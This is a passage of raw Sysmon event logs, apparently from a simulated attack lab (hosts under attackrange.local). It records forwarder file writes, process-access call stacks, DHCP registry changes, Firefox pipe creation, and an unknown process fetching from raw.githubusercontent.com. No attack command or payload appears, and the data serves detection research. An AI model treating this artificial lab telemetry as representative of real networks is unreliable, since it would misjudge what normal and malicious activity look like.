21:50:42.368{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=037317440D3812BC1811203AC5D89D8A,SHA256=2E5B0091D3F6BA23D5DC40491C5ABC9D49D32EFE7FB71DD24DBFDC0C37FCF55A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918072Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.208{896A638B-B979-6058-2004-00000000AE01}6812ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6812.xml~RFbb1ebb9.TMPMD5=A8CFD3D12386DC6A33D4D0AA8A92E2D4,SHA256=0B6A06A6A6D5D8966E9E1493F53C88F05BC7A8594863496AEB7316C46665D738,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918132Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918131Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918130Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.667{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC1A3B15234DFF8429FFCA95382493C8,SHA256=140B51D85F7FC0617EC1349960E5C3E67558AC2C4BC31D01978A060D7F6D041C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918129Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.656{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A9C42A18A9FBF9FEC286425401458C3,SHA256=4D71D4BB7F50263729DAC832004AF60CBF40F215046AC30A7F28E84D25EE48F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918128Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.407{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0366AA0C89E7D44AD4B548716C246156,SHA256=FD276E229FBAF005947C1D7785F63881D66C1A6AF44D8A14861912B63BE169FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638650Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:39.427{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57264-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638649Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:43.288{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F5EC59416DCFCA58468C609A3209795,SHA256=A1FDF5261FC78CEBBC51A8CAAFFB8981AF540B0ABD46936461C9513E55230DCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638648Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:43.178{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0519CE6C4EF920C067F1CF0722FCE99F,SHA256=F980A1028CDBC0C8EECE07CCE2DB6FC0A56B8D9302743612616387F0206869F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638647Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:43.178{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD30367CC1D5F2B3943D757BD0317520,SHA256=9C0C42DDA671099462AE879A3316E98F37A1D8978630F6500A17539F4663E8D1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005918127Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.287{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\SiteSecurityServiceState.txt2021-03-22 16:50:37.956 23542300x80000000000000005918126Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.287{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\SiteSecurityServiceState.txtMD5=30DA5E7E3119FFB1A93BC4A76CFE5149,SHA256=9963C0E0A1696498AEBB7F9021EA06C912C58F14652867D66FF050FB4D086FEF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005918125Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000005918124Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000005918123Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\AddressTypeDWORD (0x00000000) 13241300x80000000000000005918122Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\LeaseTerminatesTimeDWORD (0x605bc243) 13241300x80000000000000005918121Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\T2DWORD (0x605bc081) 13241300x80000000000000005918120Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\T1DWORD (0x605bbb3b) 13241300x80000000000000005918119Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\LeaseObtainedTimeDWORD (0x605bb433) 13241300x80000000000000005918118Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\LeaseDWORD (0x00000e10) 13241300x80000000000000005918117Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\DhcpServer10.0.1.1 13241300x80000000000000005918116Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\DhcpSubnetMask255.255.255.0 13241300x80000000000000005918115Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\DhcpIPAddress10.0.1.14 13241300x80000000000000005918114Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:43.253{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{701ea7b4-22ea-4795-8b10-1f913bf6623b}\DhcpInterfaceOptionsBinary Data 23542300x80000000000000005918178Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.883{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8803A89B2C4E1B042D7043C9DBEFBC2D,SHA256=23FE191CD4CCB53887C213DDF911A687830F9CC918DE7CD050305FDB5140A98D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918177Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.745{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918176Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.745{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000005918175Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.418{00000000-0000-0000-0000-000000000000}7868raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000005918174Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.693{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668307F91983BAD58FD2A3B8991F9455,SHA256=145AE18FE379044E2B095F4C7B7F1437C2A4CE0D1D3FBE9D48675CD039EC85E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918173Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.686{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA5B3889A044664BB4D2198EC22BD4E1,SHA256=2056786B65F753DD8C5F88B3F46324EF1E5F04E0F38C3F35CA9F582A4071371C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918172Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.543{896A638B-B5CB-6058-1600-00000000AE01}13082020C:\Windows\System32\svchost.exe{896A638B-B5DB-6058-2F00-00000000AE01}2656C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918171Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.543{896A638B-B5CB-6058-1600-00000000AE01}13082020C:\Windows\System32\svchost.exe{896A638B-B5DB-6058-2F00-00000000AE01}2656C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638651Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:44.303{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02C1F3D4697D45DA74C03A5C46E02D9F,SHA256=C0E356F2D62E30592EEC188D14A9D9F376C4544B20B1C1C559306ACEF2AF41D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918170Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.467{00000000-0000-0000-0000-000000000000}7868<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1525-false185.199.111.133cdn-185-199-111-133.github.com443https 354300x80000000000000005918169Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.414{00000000-0000-0000-0000-000000000000}7868<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1524ingreslockfalse185.199.111.133cdn-185-199-111-133.github.com443https 17141700x80000000000000005918168Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.241{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.156.54789522C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918167Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.241{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.155.142773008C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918166Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12169d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac861|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 17141700x80000000000000005918165Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.154.206825202C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918164Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12168d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac67e|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 17141700x80000000000000005918163Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.153.80798741C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918162Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12167d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac4c4|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 17141700x80000000000000005918161Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.152.119876033C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918160Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12166d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac305|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla Firefox\xul.dll+5c0f21|C:\Program Files\Mozilla Firefox\xul.dll+2e33065|C:\Program Files\Mozilla Firefox\xul.dll+2b78c3|C:\Program Files\Mozilla Firefox\xul.dll+2b6615|C:\Program Files\Mozilla Firefox\xul.dll+19b4298|C:\Program Files\Mozilla Firefox\xul.dll+568a90|C:\Program Files\Mozilla Firefox\xul.dll+504aa6|C:\Program Files\Mozilla Firefox\xul.dll+c63dd1|C:\Program Files\Mozilla Firefox\xul.dll+4bec0a|C:\Program Files\Mozilla Firefox\xul.dll+1ba5154 17141700x80000000000000005918159Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.151.208923900C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918158Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.240{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+51f21|C:\Program Files\Mozilla Firefox\xul.dll+297003d|C:\Program Files\Mozilla Firefox\xul.dll+2969a29|C:\Program Files\Mozilla Firefox\xul.dll+29494c3|C:\Program Files\Mozilla Firefox\xul.dll+29487fc|C:\Program Files\Mozilla Firefox\xul.dll+294b972|C:\Program Files\Mozilla Firefox\xul.dll+19b4a20|C:\Program Files\Mozilla Firefox\xul.dll+19af5f7|C:\Program Files\Mozilla Firefox\xul.dll+5c139f|C:\Program Files\Mozilla 